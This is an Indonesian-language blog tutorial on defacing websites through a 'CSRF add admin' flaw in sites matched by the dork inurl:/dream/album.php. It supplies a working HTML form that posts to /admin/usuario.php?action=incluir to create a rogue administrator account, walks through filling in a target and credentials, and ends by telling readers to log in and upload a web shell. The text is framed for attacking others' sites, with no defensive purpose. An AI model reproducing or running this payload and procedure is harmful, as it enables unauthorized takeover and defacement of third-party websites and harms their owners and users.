![](https://newbiecybersecurity.wordpress.com/wp-content/uploads/2020/10/120219613_1043093009466578_654275574819553310_n-9.jpg?w=640)
baik kali ini saya akan memberikan tutorial deface menggunakan metode CSRF – ADD ADMIN
bagi kalian yang belum tau apa si CSRF Itu Klik aja disini Touch Me
dari judulnya saja kita sudah mengetahui bahwa add admin itu menambahkan admin, loh bagaimana bisa kak kan kita belum masuk ke dashboardnya?
jadi metode ini menjelaskan bahwa kita hanya membutuhkan url dan token dari sebuah website itu dengan script yang saya kasi di bawah…..
langsung saja bagaimana cara melakukannya?….
Pertama
cara pertama kalian hanya perlu mempersiapkan Script + Dork + Shell / JSO
Exploit CSRF : Touch Me
Dork : inurl:/dream/album.php (kembangin lagi yoo)
Kedua ( Exploitasi / eksekusi )
Cara kedua –> setalah kalian dorking dengan dork di atas Pilihlah web mana saja yang menurut anda vuln…. Oke disini saya meneukan web yang vuln… loh ko bisa tau kak kalau itu vuln? karna pas di tambahkan patch admin maka akan langsung menjukan halaman admin login…
![](https://newbiecybersecurity.wordpress.com/wp-content/uploads/2020/10/image.png?w=1024)
bagaimana cara mengeksekusinya… coba kalian lihat di CSRF pada bagian
<form method=”post” action=”https://{target kalian}/{path}/admin/usuario.php?action=incluir”>
<input type=”hidden” name=”user_login” value=”aryakedek”>
<input type=”hidden” name=”user_password” type=”hidden” value=”123456″ >
<input type=”hidden” name=”user_email” value=”email@gmail.com”>
<input type=”submit” value=”Tusbol”>
nah di bagian ACTION isi dengan web kalian –> ingat bagian /admin/usuario.php?action=incluir gausah di apa apain yang kalian ganti hanya https://{target kalian}/{path}
paham??
pada bagian name=”user_login” value=”ini usernme anda buat nanti login admin” –> sama dengan name=”user_password” type=”hidden” value=”ini password untuk login nanti”
email juga sama kaya di atas isinya…
oke kalau sudah masukan target ke CSRF –>
disini terlihat
username : gembel12
password : 123456
dan kita save CSRF nya.. dan buka di browser kalian masing masing
langsung aja klik Tusbol….
dan otomatis akan ke Redirect ke halaman login admin
nah disini kita sudah menyimpulkan bahwa username dan password kita sudah di tambah di server dia…
mari kita buka
yap bisa dilihat masuk ke dashboard menggunakan username dan password itu 🙂
kalian ke album dan JSO + Upload shell deh 🙂
sekian tutorial dari saya..
semoga bermanfaat assalamualaikum wr wb sampai jumpaa….